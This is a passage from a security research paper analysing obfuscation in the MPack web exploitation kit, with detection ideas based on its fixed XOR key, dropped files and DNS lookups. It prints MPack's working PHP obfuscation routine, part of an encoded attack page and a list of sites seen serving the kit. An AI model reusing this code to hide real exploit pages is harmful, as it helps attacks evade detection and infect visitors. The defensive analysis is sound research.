OBFUSCATION

Obfuscation is a mechanism to hide attacks from static detection tools, which use signatures to match against a known malicious string. Obfuscation causes the appearance of the malicious string to change therefore evading these detection tools. It is a technique we frequently encounter and something that is supported by the IcePack and MPack tool. With access to the MPack code, we are able to take a deeper look at how obfuscation is applied and whether there are weaknesses in the obfuscation routine.

Attack pages provided by MPack are obfuscated. The decryption routine executes three time before the attack page is in a state in which the browser can execute the contained attack code. A sample of the various obfuscation functions is shown in Figure 9 , which leads to an obfuscated attack page as shown in Figure 10 . It is obvious that a simple string matching algorithm would be unable to match on the attack code if this content changes upon every request.

00: function encrypt2($content)
01: {
02:  $table = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_@";
03:  $xor = 165;
04:  $table = array_keys(count_chars($table, 1));
05:  $i_min = min($table);
06:  $i_max = max($table);
07:  for ($c = count($table); $c > 0; $r = mt_rand(0, $c--))
08:  array_splice($table, $r, $c - $r, array_reverse(array_slice($table, $r, $c - $r)));
09:  $len = strlen($content);
10:  $word = $shift = 0;
11:  for ($i = 0; $i < $len; $i++)
12:  {$ch = $xor ^ ord($content[$i]);
13:   $word |= ($ch << $shift);
14:   $shift = ($shift + 2) % 6;
15:   $enc .= chr($table[$word & 0x3F]);
16:   $word >>= 6;
17:   if (!$shift) { $enc .= chr($table[$word]); $word >>= 6; }}
18:   if ($shift)
19:   $enc .= chr($table[$word]);
20:  $tbl = array_fill($i_min, $i_max - $i_min + 1, 0);
21:  while (list($k,$v) = each($table))
22:  $tbl[$v] = $k;
23:  $tbl = implode(",", $tbl);
24:  $fi = ",p=0,s=0,w=0, t=Array({$tbl} )";
25:  $f = "w|=(t[ x.charCodeAt(p++)-{$i_min}])<<s;";
26:  $f .= "if(s){r+=String.fromCharCode({$xor}^w&255);w>>=8;s-=2}else{s=6}";
27:  $r = "<script language=JavaScript>";
28:  $r.= "function dc(x){";
29:  $r.= "var l=x.length,i,j,r,b=(4096/4){$fi};";
30:  $r.= "for(j= Math.ceil(l/b);j>0;j--){r=''; for(i=Math.min(l,b);i>0;i--,l--{{$f}}document.write(r)}";
31:  $r.= "}dc(\"{$enc}\")";
32:  $r.= "</script>";
33:  $r2 = "document.write( unescape('%3C%73%63%72%69%70%74%3E%20%0D%0A%66%75%6E%63%74%69%6F%6E%20%7A%58%28%73%29%0D
     %0A%7B%20%76%61%72%20%73%31%3D%20%75%6E%65%73%63%61%70%65%28%20%73%2E%73%75%62%73%74%72%28%30%2C%20%73%2E%6C%65%6E
     %67%74%68%2D%31%29%29%3B%20%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68
     %3B%69%2B%2B%29%20%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%20%73%31%2E%63%68%61%72%43
     %6F%64%65%41%74%28%69%29%2D%20%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%20%31%29%29%3B%20%0D%0A
     %64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%20%7D%0D%0A%3C%2F%73%63%72%69
     %70%74%3E')); zX('".encodezTxt($content)."');";
34:  $r2 = "<Script Language='JavaScript'>".$r2."</Script>"; // [\\'\">]
35:  $r2 = "<script language=javascript>document.write(unescape(\"" .escape($r2). "\"))</script>";
36:  return $r2;
37: }

Figure 8 - MPack Obfuscation Routine

However, MPack v0.94 currently contains a major bug in its obfuscation routine: it produces unchanged obfuscated output on the same attack page (the bug is located on line 3 of Figure 9 : instead of 165, it should be a random number). Even if the bug is fixed, there seems to be a finite number of obfuscated pages the current version of MPack could generate, and therefore static matching does fall into the realm of possibility on the attack page. Alternatively, several efforts attempt to decrypt obfuscated JavaScript and statically analyze the code in the clear [15],[16] or the code's behavior within a JavaScript engine [17].

<script language=javascript>document.write(unescape("%3CScript%20Language%3D%27JavaScript%27%3Edocument.write%28
%20unescape%28%27%253C%2573%2563%2572%2569%2570%2574%253E%2520%250D%250A%2566%2575%256E%2563%2574%2569%256F%256E
%2520%257A%2558%2528%2573%2529%250D%250A%257B%2520%2576%2561%2572%2520%2573%2531%253D%2520%2575%256E%2565%2573
%2563%2561%2570%2565%2528%2520%2573%252E%2573%2575%2562%2573%2574%2572%2528%2530%252C%2520%2573%252E%256C%2565
%256E%2567%2574%2568%252D%2531%2529%2529%253B%2520%2520%2576%2561%2572%2520%

...

%252A5I%252A5F%252A5I%252A5F%252A8H%252A7Kxhwnuy%252A8J%252A5I%252A5F%252A8H%252A7Kmjfi%252A8J%252A5I%252A5F%252A8H
gti%257E%252A75tsqtfi%252A8I%252A77xyfwy%252A7%253D%252A7%253E%252A77%252A8J%252A5I%252A5F%252A8Hin%257B%252A75ni
%252A8I%252A77r%257Ein%257B%252A77%252A8J%252A8H%252A7Kin%257B%252A8J%252A5I%252A5F%252A8H%252A7Kgti%257E%252A8J
%252A5I%252A5F%252A8H%252A7Kmyrq%252A8J%252A5I%252A5F%252A8Hnkwfrj%252A75%257Cniym%252A8I6%252A75mjnlmy%252A8I6
%252A75gtwijw%252A8I5%252A75kwfrjgtwijw%252A8I5%252A75xwh%252A8I%252A77myyu%252A8F%252A7K%252A7Kfqqmnlm2inxfgqji3twl
%252A7Khtzsyjw%252A7Knsij%257D3umu%252A77%252A8J%252A8H%252A7Knkwfrj%252A8J5%27%29%3B%3C/Script%3E"))</script>

Figure 9 - Obfuscated Attack Page (Snippet)

On top of this obfuscation, however, additional obfuscation is likely to be applied to the front-end page that imports the page from the exploit server. These front-end pages do not merely place a static iframe on the page that imports the exploit. Rather, obfuscated JavaScript snippets append the iframe (via the document.write method) to the page once it is opened. Since this technique is independent of the web exploitation kit, it might even been applied with the earlier web exploitation kits that did not support obfuscation.

In addition, there are other means to determine whether a web exploitation kit is involved in an attack. A successful attack by a particular web exploitation kit seems to cause similar state changes on the client machine (see Appendix A for a complete list of state changes encountered on the URL http://www.keithjarrett.it, which was attacked by an MPack server). As such, simply reviewing the state changes that are caused on the client, one is able to infer what web exploitation kit was used in the attack. For example, reviewing the MPack attack page we observe that a file with the name “sys” plus four random characters and “.exe” is always pushed to C:\. Matching on this behavioral signature of this specific file write event among the state changes yields an identification of MPack attacks. From the 306 malicious URLs we identified in our KYE study, we were able to identify 13 URLs (or 4.24%) that utilized MPack using these behavioral signatures:

URL
http://www.sexyclips.org/media.php?clip=one_night_in_paris_spoof.html
http://mashathumbs.com/
http://www.forumsplace.com/page_not_found.php
http://www.keithjarrett.it/
http://www.aerosmith.com/
http://www.versiontwo.org/old/archives/2003/05/jessica_lynch_r.html
http://www.spacefellowship.com/News/?p=1824
http://www.globalwarmingbar.com/
http://www.dalekeiger.com/?p=133
http://77kelvin.a55.nthosting.ru/
http://www.PoochTV.com
http://www.forumwz.org/archive/index.php/f-14.html
http://www.cracks.vg/cracks/The_Sims_2_Virtual_Disk_111912.html

Table 3 - MPack URLs

We also discovered a static iframe as part of the attack page in Mpack that attempted to import an additional page “/counter/index.php” from a the remote web server “allhigh.org”. If this was indeed included by the creators of MPack, the purpose of it might be to count the number of times their framework is used or to potentially steal a customer for themselves. The path name indicates that it is used for counting, but because the URL is not live anymore we can not assure any explanation. Either way, if such static iframes are used, identification of a web exploitation kit would be straightforward: simply monitor DNS lookups to the specific host name. If a DNS lookup of allhigh.org is observed, that would be the indicator that a client attack by a web exploitation kit MPack was attempted.